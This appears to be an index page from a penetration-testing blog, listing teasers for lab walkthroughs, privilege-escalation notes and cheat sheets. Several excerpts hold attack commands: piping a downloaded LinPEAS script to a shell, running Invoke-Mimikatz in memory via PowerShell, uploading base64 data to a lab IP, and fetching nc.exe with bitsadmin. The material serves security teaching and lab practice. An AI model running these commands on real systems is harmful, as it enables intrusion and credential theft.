Bharath Narayanasamy

Linux Privilege Escalation

LinPEAS Latest Releases: Release Release refs/heads/master 20230425-bd7331ea · carlospolop/PEASS-ng · GitHub # From Github curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # Local network sudo python3 -m http.server 80 #Host curl 10.10.10.10/linpeas.sh…

Bharath Narayanasamy

VulnLAB

How to crack zip password on KALI linux

Fcrackzip is a fast password cracker partly written in assembler. It is able to crack password protected zip files with brute force or dictionary based attacks, optionally testing with unzip…

Bharath Narayanasamy

VulnLAB Practical LABS

VulnHub OS-bytesec: Walkthrough

Enumeration Nmap scan C:\home\zybersec\vulnhub\OS-bytesec> nmap -sC -sV -p- -A -T5 172.16.1.107 -oN OS-bytesec.txt Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 11:46 CEST Nmap scan report for 172.16.1.107 Host is…

Bharath Narayanasamy

VulnLAB Practical LABS

VulnHUB Prime-1: Walkthrough

Enumeration Nmap scan C:\home\zybersec> nmap -sC -sV -p- -A -T5 172.16.1.107 -oN prime1.txt Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 07:53 CEST Nmap scan report for 172.16.1.107 Host is…

Bharath Narayanasamy

WebPentest Enumeration

CURL

Wordpress curl -s http://blog.inlanefreight.local | grep WordPress curl -s http://blog.inlanefreight.local/ | grep themes curl -s http://blog.inlanefreight.local/ | grep plugins curl -s http://blog.inlanefreight.local/?p=1 | grep plugins

Bharath Narayanasamy

VulnLAB Practical LABS

VulnHUB C0lddboxx-Easy: Walkthrough

Enumeration Nmap

Bharath Narayanasamy

PenTest WebPentest

Attacking Drupal

Leveraging Known Vulnerabilities Over the years, Drupal core has suffered from a few serious remote code execution vulnerabilities, each dubbed Drupalgeddon. At the time of writing, there are 3 Drupalgeddon vulnerabilities…

Bharath Narayanasamy

Practical LABS VulnLAB

Walkthrough – VulnHUB DC-1

Enumeration Nmap scan nmap -sC -sV -p- -A -T5 172.16.1.106 -oN dc01.txt Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-29 07:04 CEST Nmap scan report for 172.16.1.106 Host is up…

Bharath Narayanasamy

Cheat Sheets

FILE TRANSFER – Cheat Sheet

CommandDescription Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1Download a file with PowerShellIEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')Execute a file in memory using PowerShellInvoke-WebRequest -Uri http://10.10.10.1:443 -Method POST -Body $b64Upload a file with PowerShellbitsadmin /transfer n http://10.10.10.1/nc.exe C:\Temp\nc.exeDownload…

Bharath Narayanasamy

Cheat Sheets

Nikto Cheat Sheet

Nikto Cheat Sheet COMMANDDESCRIPTIONnikto -h http://nlabs.localScans the specified hostnikto -h http://nlabs.local -Tuning 6Uses a specific scan tuning levelnikto -h http://nlabs.local -port 8080Scans the specified portnikto -h http://nlabs.local -sslScans for SSL…

Bharath Narayanasamy